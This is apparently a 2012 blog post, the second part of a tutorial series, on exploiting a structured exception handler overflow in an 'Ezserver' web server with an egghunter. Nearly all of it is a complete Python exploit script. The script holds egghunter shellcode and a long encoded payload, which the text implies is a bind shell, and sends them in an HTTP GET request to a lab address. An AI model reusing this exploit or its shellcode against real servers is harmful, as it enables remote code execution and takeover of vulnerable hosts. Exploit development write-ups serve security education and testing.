Wednesday, October 03, 2012

SEH Exploit Ezserver part 2 ( egghunter )

previously (on part 1), we heve discusssed until generate payload for calculator.
why i use calculator ??? because the payload for calculator just need small size to prove that we have no problem about the fuzzer.
but why don't use payload for bind shell ?? because we have no more space to landing the payload.

so i try to use egghunter. (for more information about egghunter, please visit here).

this is the scenario :

buffer=(w00tw00t+payload+nop1)+JMP SHORT+address of .dll (Stepping stone)+ nop2+egghunter

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000

buffer="\x90"*5427

egghunter=("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

payload=("\xbf\x31\x61\x90\xb0\xdb\xc9\x2b\xc9\xd9\x74\x24\xf4\xb1\x51\x5b"
"\x31\x7b\x12\x03\x7b\x12\x83\xda\x9d\x72\x45\xe0\x34\x98\xeb\xf0"
"\x30\xa1\x0b\xff\xa3\xd5\x98\xdb\x07\x61\x25\x1f\xc3\x09\xa3\x27"
"\xd2\x1e\x20\x98\xcc\x6b\x68\x06\xec\x80\xde\xcd\xda\xdd\xe0\x3f"
"\x13\x22\x7b\x13\xd0\x62\x08\x6c\x18\xa8\xfc\x73\x58\xc6\x0b\x48"
"\x08\x3d\xdc\xdb\x55\xb6\x43\x07\x97\x22\x1d\xcc\x9b\xff\x69\x8d"
"\xbf\xfe\x86\x32\xec\x8b\xd0\x58\xc8\x97\x83\x63\x21\x73\x27\xe8"
"\x01\xb3\x23\xae\x89\x38\x43\x32\x3f\xb5\xe4\x42\x61\xa2\x6a\x1c"
"\x93\xde\x23\x5f\x7d\x78\x97\xf9\xea\xb6\x25\x6d\x9c\xcb\x7b\x32"
"\x36\xd3\xac\xa4\x7d\xc6\xb1\x0f\xd2\xe6\x9c\x30\x5b\xfd\x47\x4f"
"\xb6\xf6\x85\x1a\x23\x05\x75\x74\xdb\xd0\x80\x81\xb1\xb4\x6d\xbf"
"\x99\x69\xc1\x6c\x4d\xcd\xb6\xd1\x22\x2e\xe8\xb3\xac\xc1\x55\x5d"
"\x7e\x6b\x84\x34\xe8\xcf\x5d\x46\x2e\x58\x9d\x70\xda\x77\x30\x29"
"\xe4\xa8\xda\x75\xb7\x67\xf2\x22\x37\xa1\x57\x99\x38\x9e\x30\xc4"
"\x8e\x99\x88\x51\xee\x70\x5a\x09\x44\x28\xa4\x61\xf7\xba\xbd\xf8"
"\x3e\x43\x15\x05\x68\xe1\x66\x29\xf3\x60\xfd\xaf\x94\x17\x90\xa6"
"\x80\xb2\x3a\xe1\x63\x8f\x32\xf6\x1e\x4b\xcc\x1a\xef\x93\x3d\x70"
"\xee\x56\xef\x7a\x4d\x7b\x7c\x0f\x28\xbb\x29\xa4\x66\xd3\x5f\x44"
"\xcb\x32\x5f\xcd\x68\xc4\x49\x76\x26\x68\x27\xd9\x99\xe6\xc6\x88"
"\x48\xa2\x99\xd5\xbb\x24\xb7\xf0\x39\x7b\x94\xfd\x94\xe9\xe4\xfe"
"\x2e\x11\xca\x8b\x06\x11\x68\x4f\xcc\x16\xb9\x1d\xf2\x39\x2e\xdf"
"\xd4\x58\xdc\x4c\x1a\x4a\xdc\xa2")

buffer+="w00tw00t"
buffer+=payload
buffer+="\x90"*100

buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL

buffer+="\x90"*16
buffer+=egghunter
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))

sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()




alhamdulillah ... :D
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)